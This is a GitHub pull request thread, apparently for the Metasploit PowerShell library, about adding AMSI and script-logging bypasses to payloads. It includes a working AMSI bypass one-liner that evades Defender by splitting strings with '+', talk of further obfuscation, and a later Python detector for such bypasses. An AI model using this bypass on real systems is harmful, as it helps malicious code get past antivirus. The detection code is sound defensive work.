
Integrate PowerShell Protections Bypass #17

Merged: 5 commits merged into rapid7:master from phra:feat/psh-protections-bypass on Apr 22, 2019

Conversation

@phra (Contributor) commented Jan 19, 2019

@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019

@bwatters-r7 (Contributor) commented Feb 14, 2019

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

@phra (Contributor, Author) commented Feb 14, 2019

@bwatters-r7 Just try any PowerShell payloads on an updated Win 10 machine with AMSI.

phra and others added some commits Feb 17, 2019

RageLtMan
Remove intrinsic use of bypasses in psh blocks
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
RageLtMan
Implement dynamic bypass addition in payload gen
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra (Contributor, Author) commented Apr 15, 2019

@timwr (Contributor) commented Apr 16, 2019

Very interesting, thanks @phra

@timwr (Contributor) commented Apr 22, 2019

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>
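As an added defensive example (not code from this PR or from Metasploit): a small Python checker that folds `'+'`-concatenated string literals in a script block before matching, so the split-string variant in the transcript above trips the same indicator list as the plain one. The script-block lines are constructed for illustration; the indicator names and the regex are this example's own choices, not the project's.

```python
import re

# Constructed sample script blocks (what PowerShell script block logging would
# record), modelled on the transcript above; not taken from real logs.
SAMPLE_SCRIPT_BLOCKS = [
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
    "$Ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);",
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');"
    "$Ref.GetField('amsiIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true);",
    "Get-ChildItem -Path 'C:\\Users' | Where-Object { $_.Name -like 'Ams'+'i*' }",
    "Write-Host 'hello ' + 'world'",
]

# Substrings that indicate tampering with PowerShell's AMSI integration
# (matched case-insensitively after folding).
AMSI_INDICATORS = ("amsiutils", "amsiinitfailed")

# Two quoted literals joined by '+': 'abc' + "def" (either quote style per side).
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def fold_concatenations(script):
    """Repeatedly merge adjacent quoted literals joined with '+' until stable,
    so 'amsiIn'+'itFai'+'led' becomes 'amsiInitFailed'."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(
            lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), script)
    return script


def indicators_in(text):
    """Return the indicators present in text, case-insensitively."""
    lowered = text.lower()
    return [ind for ind in AMSI_INDICATORS if ind in lowered]


def scan_block(script):
    """Compare a naive substring match ('raw') with matching after folding."""
    return {"raw": indicators_in(script),
            "folded": indicators_in(fold_concatenations(script))}


def flagged_blocks(blocks):
    """Indices of blocks that match any indicator once concatenations are folded."""
    return [i for i, b in enumerate(blocks) if scan_block(b)["folded"]]


if __name__ == "__main__":
    for i, block in enumerate(SAMPLE_SCRIPT_BLOCKS):
        print(i, scan_block(block))
```

Block 1 is missed by the raw match but caught after folding; blocks 2 and 3 show that folding alone does not create false positives on ordinary concatenation.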

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019

1 check passed: continuous-integration/travis-ci/pr (The Travis CI build passed)

timwr added a commit that referenced this pull request Apr 22, 2019

@timwr (Contributor) commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

@phra (Contributor, Author) commented Apr 23, 2019

> I didn't expect the '+' to work so well:

> It would be nice to have the strings obfuscated dynamically, but this will do for now.

Empire includes https://github.com/danielbohannon/Invoke-Obfuscation, but it depends on PowerShell, and that means adding it as an optional(?) dependency or embedding it directly within the project with a ~50mb overhead of stuff.

Writing a simpler, similar project in Ruby may be overkill.

Any ideas?


@phra phra deleted the phra:feat/psh-protections-bypass branch Apr 23, 2019

@phra (Contributor, Author) commented May 1, 2019

Was the prepend_protections_bypass option defined somewhere?

I don't see the setting available yet with Framework Version: 5.0.19-dev.

@timwr (Contributor) commented May 10, 2019

@phra Apologies, I didn't send a PR with that part; I think I tested with this commit: timwr/metasploit-framework@a0d6bcd

@phra (Contributor, Author) commented May 10, 2019

Oh ok, I hope it will be merged into master soon!
Regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as the target.

@phra (Contributor, Author) commented Jul 21, 2019

Any update? I still cannot easily add the AMSI bypass to PowerShell payloads.
